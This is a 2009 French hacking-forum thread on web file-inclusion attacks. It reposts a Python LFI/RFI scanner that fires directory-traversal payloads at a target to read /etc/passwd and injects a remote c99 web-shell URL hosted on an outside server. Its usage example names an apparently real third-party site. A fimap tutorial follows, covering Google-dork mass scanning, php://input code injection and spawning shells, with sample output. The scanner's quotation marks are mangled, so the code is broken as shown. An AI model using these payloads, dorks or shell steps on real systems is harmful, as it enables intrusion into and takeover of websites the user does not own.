Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: RFI et LFI ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps
Sujet précédent :: Sujet suivant  
Auteur Message
Karl
Membre
Membre

Hors ligne

Inscrit le: 23 Nov 2009
Messages: 108

MessagePosté le: Dim 29 Nov - 18:41 (2009)    Sujet du message: RFI et LFI Répondre en citant

#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
# In version 2 added proxy support
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ _ __| _/____ #
# / __ |__ \_ __ |/ // ___/ /_ / __ |/ __ #
# / /_/ | / __ | | / < ___ _/ / /_/ ___/ #
# ____ |(______/__| |__|_ \_____>_____ /_____|____ #
# / / / #
# ___________ ______ _ __ #
# _/ ____ __ _/ __ / / / #
# ___| | / ___/ / #
# ___ >__| ___ >/_/ #
# est.2007 / / forum.darkc0de.com #
################################################################
# — d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# — QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# — Eliminator and to all members of darkc0de and ljuska.org# #
################################################################

import sys, os, time, re, urllib2, socket, httplib

if sys.platform == ‘linux’ or sys.platform == ‘linux2′:
clearing = ‘clear’
else:
clearing = ‘cls’
os.system(clearing)

proxy = “None”
count = 0

if len(sys.argv) < 2 or len(sys.argv) > 4:
print “n|—————————————————————|”
print “| b4ltazar[@]gmail[dot]com |”
print “| 01/2009 LFI & RFI scanner v2.0 |”
print “| Help: lfi-rfi.py -h |”
print “| Visit www.darkc0de.com and www.ljuska.org |”
print “|—————————————————————|n”
sys.exit(1)

for arg in sys.argv:
if arg == ‘-h’ or arg == ‘–help’ or arg == ‘-help’:
print “n|——————————————————————————-|”
print “| b4ltazar[@]gmail[dot]com |”
print “| 01/2009 LFI & RFI scanner v2.0 |”
print “| Usage: lfi-rfi.py www.site.com |”
print “| Example: lfi-rfi.py http://toscana.adiconsum.it/index.php?pagina= |”
print “| Proxy: lfi-rfi.py http://toscana.adiconsum.it/index.php?pagina= -p PROXY |”
print “| Visit www.darkc0de.com and www.ljuska.org |”
print “|——————————————————————————-|n”
sys.exit(1)
elif arg == ‘-p’:
proxy = sys.argv[count+1]
count += 1

lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

site = sys.argv[1]
shell = ‘http://www.defcont4.hypersite.com.br/shell/c99.txt?’
if site[:4] != “http”:
site = “http://”+site
if site[-1] != “=”:
site = site + “=”

print “n|—————————————————————|”
print “| b4ltazar[@]gmail[dot]com |”
print “| 01/2009 LFI & RFI scanner v2.0 |”
print “| Visit www.darkc0de.com and www.ljuska.org |”
print “|—————————————————————|n”
print “n[-] %s” % time.strftime(”%X”)
print
print “-”*80
print “tttChecking for LFI”
print “-”*80
print “n[+] Target:”,site
print “[+]“,len(lfis),”LFI loaded…”
print “[+] Starting Scan…n”

try:
if proxy != “None”:
print “n[+] Testing Proxy…”
pr = httplib.HTTPConnection(proxy)
pr.connect()
print “[+] Proxy:”,proxy
print “[+] Building Handler”
print
proxy_handler = urllib2.ProxyHandler({’http’: ‘http://’+proxy+’/'})
else:
print “n[-] Proxy not given”
print
proxy_handler = “”
except(socket.timeout):
print “n[-] Proxy Timed Out”
sys.exit(1)
except(),msg:
print msg
print “n[-] Proxy Failed”
sys.exit(1)

for lfi in lfis:
print “[+] Checking:” ,site+lfi.replace(”n”,”")
print
proxyfier = urllib2.build_opener(proxy_handler)
try:
check = proxyfier.open(site+lfi.replace(”n”, “”)).read()
if re.findall(”root:x:”, check):
print “[!] w00t!,w00t!: “,lfi
print
else:
print “[-] Not Found: “,lfi
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
raise
print
print “-”*80
print “tttChecking for RFI”
print “-”*80
print “n[+] Target:”,site
print “[+] Starting Scan…n”

try:
check = proxyfier.open(site+’http://www.defcont4.hypersite.com.br/shell/c99.txt?’).read()
if re.findall(”c99shell”, check):
print “[!] w00t!,w00t!: “,site+shell
print
else:
print “[-] Not Found: “,site+shell
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
pass

print
print “n[-] %s” % time.strftime(”%X”)


Revenir en haut
Publicité






MessagePosté le: Dim 29 Nov - 18:41 (2009)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Karl
Membre
Membre

Hors ligne

Inscrit le: 23 Nov 2009
Messages: 108

MessagePosté le: Dim 29 Nov - 19:51 (2009)    Sujet du message: RFI et LFI Répondre en citant

Fimap
A little tool for local and remote file inclusion auditing and exploitation.

http://fimap.googlecode.com/files/fimap_alpha_v06_1.tar.gz


Revenir en haut
Karl
Membre
Membre

Hors ligne

Inscrit le: 23 Nov 2009
Messages: 108

MessagePosté le: Mer 16 Déc - 11:18 (2009)    Sujet du message: RFI et LFI Répondre en citant

Title : LFI/RFI testing and exploiting with fimap
Autor : Iman Karim (ikarim2s[YOUKNOW]smail.inf.fh-brs.de)
Date : 3. September 2009
Project: http://fimap.googlecode.com


fimap is currently under development but still usable. Feel free to test it!
This document and tool is not recommend for people who doesn't know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.


Table of Contents
0. Introduction
[a] What is fimap?
[b] Let's go.
1. Single URL Scan
[a] Why?
[b] Ok - show me how.
2. Mass Scan
3. Google Scan
4. Obtaining a shell
5. Full Example Run
6. Last Words
7. Greetings



[0] INTRODUCTION
[a] What is fimap?
fimap is a Local- and Remote-File-Injection scanner and exploiter written by me.
It's released under GPLv2 and you can download it at http://fimap.googlecode.com

[b] LET'S GO
Befor we start make sure that you don't use fimap for illegal stuff.
Use it only on your own site to test if your inclusions are secure or not.
You use it at your own risk and I don't take any responsibility for it.
Ok - Let's go then!

[1] SINGLE URL SCAN
[a] Why?
Sometimes I am playing on my websites GET variables in the browser to check for inclusion bugs.
When I actually find something fimap is my friend. I can simply give him the URL I found and fimap
will do the rest for me.

[b] Ok - show me how.
It's very easy to start a single url scan.
Simply start fimap using the -u or --url parameter:

imax@DevelB0x:~$ ./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"

If fimap has found an Inclusion-Bug, you will see a box like this:

###################################################################################
#[1] Possible File Injection #
###################################################################################
# [url=http://localhost/vulnerable.php?inc=index]http://localhost/vulnerable.php?inc=index #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################

You can see that we actually have readable files. Some of them are usable to inject code - some not.
fimap will automaticly log every valuable result to '~/fimap_results.xml'. The XML will never be deleted.
All new results will be injected correctly into the XML. Feel free to delete it if you want.
Possible injections which can't be successfully exploited by fimap will be logged into a dirty
csv file: '~/fimap.log'

Well, that's it for single url scanning! Smile
If you want to spawn a shell using your newly found bug(s) watch [4]

[2] MASS SCAN
Mass scanning is very similar to single url scanning. The only difference is (you guess it):
you can scan a whole txt (each line = one url) for inclusion bugs.
Just like in single url mode everything will be logged to the log files.
To use mass mode use:

imax@DevelB0x:~$ ./fimap.py -m -l "/tmp/myurllist.txt"


[3] GOOGLE SCAN
Same as mass scan. But instead of getting the urls from a txt-list it will use google to get urls.
To use google mode use:

imax@DevelB0x:~$ ./fimap.py -g -q 'inurl:"include.php"'
or
imax@DevelB0x:~$ ./fimap.py -g -q 'inurl:"req.php" -svn -trak -cvs'

[4] OBTAINING A SHELL
If you have found some inclusion bugs you can directly make use of them!
Simply call:

imax@DevelB0x:~$ ./fimap.py -x

fimap will ask you some questions and then you should have a shell!

[5] FULL EXAMPLE RUN

[CMD]imax@DevelB0x:~$ ./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"
fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: 'http://localhost/vulnerable.php?inc=index.php'
[OUT] Parsing URL 'http://localhost/vulnerable.php?inc=index.php'...
[INFO] Fiddling around with URL...
[OUT] Possible file inclusion found! -> 'http://localhost/vulnerable.php?inc=bUTeWg6j' with Parameter 'inc'.
[OUT] Identifing Vulnerability 'http://localhost/vulnerable.php?inc=index.php' with Key 'inc'...
[INFO] Scriptpath received: '/var/www'
[INFO] Testing file '/etc/passwd'...
[INFO] Testing file '/proc/self/environ'...
[INFO] Testing file 'php://input'...
[INFO] Testing file 'http://www.phpbb.de/index.php'...
[INFO] Testing file 'http://www.uni-bonn.de/Frauengeschichte/index.html'...
[INFO] Testing file 'http://www.kah-bonn.de/index.htm?presse/winterthur.htm'...
###################################################################################
#[1] Possible File Injection #
###################################################################################
# [url=http://localhost/vulnerable.php?inc=index.php]http://localhost/vulnerable.php?inc=index.php #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################
[CMD]imax@DevelB0x:~$ ./fimap.py -x
fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
###################
#List of Domains #
###################
#[1] localhost #
###################
Choose Domain: 1
###############################################################################################
#FI Bugs on localhost #
###############################################################################################
#[1] URL: '/vulnerable.php?inc=index.php' injecting file: 'php://input' using param: 'inc' #
###############################################################################################
Choose vulnerable script: 1
[INFO] Testing code injection thru POST...
[OUT] PHP Injection works! Testing if execution works...
[OUT] Testing execution thru 'popen'...
#################################
#Available Attacks #
#################################
#[1] Spawn Shell #
#[2] Create reverse shell... #
#################################
Choose Attack: 1
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! Wink
Enter 'q' to exit the shell.
-------------------------------------------
fimap_shell$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
fimap_shell$> uname -a
Linux DevelB0x 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
fimap_shell$> q

See ya dude!


[6] LAST WORDS
You can configure most of the attack vectors in the config.py file inside your fimap directory.
The file is documentated. So check the file for more infos. All I can say here is that if you
want the full advantage of RFI attacks you should configure your settings["dynamic_rfi"] dict.
Please remember that fimap is currently under a week old and under heavy development.
Goto http://fimap.googlecode.com and stay tuned about updates.
To check out the lastest code use:
svn checkout http://fimap.googlecode.com/svn/trunk/ fimap

I don't know and currently don't care if it works on windows. Works fine on Unixes.
If you find a bug feel free to report it.
I hope you like it.

[7] GREETINGS
Greetings to: rita, exorzist, invisible, ruun, beatkeeper, dextrous


Afghans can code too! Smile



Revenir en haut
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 09:08 (2017)    Sujet du message: RFI et LFI

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com